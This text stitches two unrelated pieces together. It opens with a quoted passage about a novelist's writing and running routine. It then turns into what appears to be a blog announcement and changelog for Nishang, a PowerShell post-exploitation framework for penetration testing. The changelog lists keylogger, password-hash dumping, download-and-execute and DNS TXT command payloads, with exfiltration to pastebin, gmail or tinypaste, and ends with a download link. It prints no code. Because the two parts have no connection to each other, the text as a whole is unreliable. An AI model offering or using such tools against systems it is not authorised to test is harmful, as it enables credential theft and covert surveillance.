"When I'm in writing mode for a novel, I get up at four a.m. and work for five or six hours.  In the afternoon, I run for ten kilometers or swim for fifteen-hundred meters (or do both), then I read a bit and listen to some music.  I go to bed at nine p.m.  I keep to this routine every day without variation.
The repetition itself becomes the important thing; it's a form of mesmerism.  I mesmerize myself to read a deeper state of mind.  But to hold to such a repetition for so long-six months to a year-requires a good amount of mental and physical strength.  In that sense, writing a long novel is like survival training.  Physical strength is as necessary as artistic sensitivity."

Own Windows with PowerShell using Nishang

Nishang is a framework and collection of scripts and payloads which enables usage of Windows PowerShell for offensive security and post exploitation during Penetraion Tests.  The scripts are written on the basis of requirement by the author during real Penetration Tests.
PAYLOADS
It contains many interesting scripts like download and execute, keylogger, dns txt pwnage, wait for command and much more.
HELP
All payloads and scripts are Get-Help compatible. Use “Get-Help -full” on a PowerShell prompt to get full help details.
 CHANGELOG for version 0.2.7

– DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely. Also, these does not stop autmoatically after running a script/command now.
– DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method.
– Fixed a minor bug in DNS_TXT_Pwnage.
– All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration.
– Added Get-PassHashes payload.
– Added Download-Execute-PS payload.
– The keylogger logs only fresh keys after exfiltring the keys 30 times.
– A delay after success has been introduced in various payloads which connect to the internet to avoid generating too much traffic.
Download: http://bit.ly/nishang